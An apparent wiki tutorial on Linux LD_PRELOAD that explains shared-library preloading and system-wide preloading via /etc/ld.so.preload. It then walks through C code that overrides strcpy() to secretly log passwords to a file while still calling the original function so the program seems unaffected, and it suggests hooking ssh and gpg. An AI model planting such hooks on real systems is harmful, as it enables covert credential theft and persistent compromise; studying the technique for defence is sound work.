LD Preload
Special thanks to ErrorProne for his contributions to this article.
Introduction
LD_PRELOAD in simplest terms is a way to "preload" a shared library. It's an option you pass to ld either using a config file or environment variable. It will be called, and overrides any library called after it:
LD_PRELOAD=./yourso.so some_command
It has to be an absolute path, you cannot do:
LD_PRELOAD=yourso.so
Unless it is already in your ld path.
LD preload is built for runtime linking. It allows compilers like gcc, g++, etc to link code and binaries against an object, shared object, or executable file at runtime. As an example, "printf()", is a part of LibC or glibc. libc.so.#.#.#, has the printf() function built-in along with an export table which contains the address to the printf() function.
Shared libraries are libraries shared between multiple executables. They are linked dynamically at runtime instead of statically during compilation. For function names, a shared library lets multiple programs access the same function address instead of loading multiple instances of the same function into memory. This is done primarily for system performance as redundant copies of a function would unnecessarily consume system resources. LD_PRELOAD allows you to tell the runtime linker to load the specified shared library "first" giving it precedence over every other library.
LD_PRELOAD use is generally innocuous; tsocks and checkinstall use it among many other programs. However, it can easily be abused. There is a config file that usually lives in /etc/ld.so.preload, which will globally preload the contents. It contains the paths to shared libraries to preload. As a result, the entire userland, save statically compiled applications (rare), will use your overridden functions. The function address is stored in either a DWORD or a QWORD (depending on CPU arch and ram accessibility) and can be extracted from the export table using the function dlsym() .
Other nasty things can be done, such as hooking ssh, hooking gpg, or anywhere a user would enter sensitive information. It is possible to preload functions like strcpy(), etc, and dump output to files for retrieval at a later date. It's just a matter of cracking open the target application and finding what calls are made on the sensitive data.
Simple Practical Example
Suppose an application asks for a user's password, hashes it, and then compares it to a stored value.
Let's say it calls:
strcpy(password, user_input); |
Grab the definition of strcpy();
char *strcpy(char *s1, const char *s2); |
To hook the function, open up the man page and copy the function definition, then add code to write the second argument to a file. So the preloaded library now contains the following:
char *strcpy(char *s1, const char *s2){ FILE *fp = fopen(your_evil_filepath, 'a'); fprintf(fp, "%s\n", s2); fclose(fp); } |
Now, there is an obvious problem with this, strcpy() doesn't work anymore and all the things that use it will break. In order to fix this, either call the original, working version of strcpy() or implement a new, working strcpy(), since it is simple primitive function. The former is preferable in most cases as it usually requires less code than rewriting the entire function. Unfortunately, calling the overridden function from within the preloaded library will not work. In order to call the original function, a new function that points to the original function must be declared. Fortunately, this is simple to do.
For strcpy, the function pointer prototype is:
char *(*strcpy)(char *dest, const char *src); |
Notice that because this is a function pointer there are two *. The first one is the return type (pointer to char) of the original function, while the one within the round brackets shows it's a function pointer. Also notice that the prototype matches strcpy's prototype. Now the function pointer must point to the original function. To do this, use the ld library function dlsym(), which is defined as:
void *dlsym(void *handle, const char *symbol); |
The handle is the name of the library containing the original function; the symbol is the name of the function. There are two special pseudo-handles, RTLD_DEFAULT and RTLD_NEXT. The former will find the first occurrence of the desired symbol using the default library search order. The latter will find the next occurrence of a function in the search order after the current library. This allows one to provide a wrapper around a function in another shared library.
So to obtain a copy of strcpy that will persist after strcpy is overridden:
char *(*old_strcpy)(char *dest, const char *src); old_strcpy = dlsym(RTLD_NEXT, "strcpy"); |
char *strcpy(char *s1, const char *s2){ FILE *fp = fopen(your_evil_filepath, 'a'); fprintf(fp, "%s\n", s2); fclose(fp); return old_strcpy(s1, s2); } |
It will now appear to behave normally.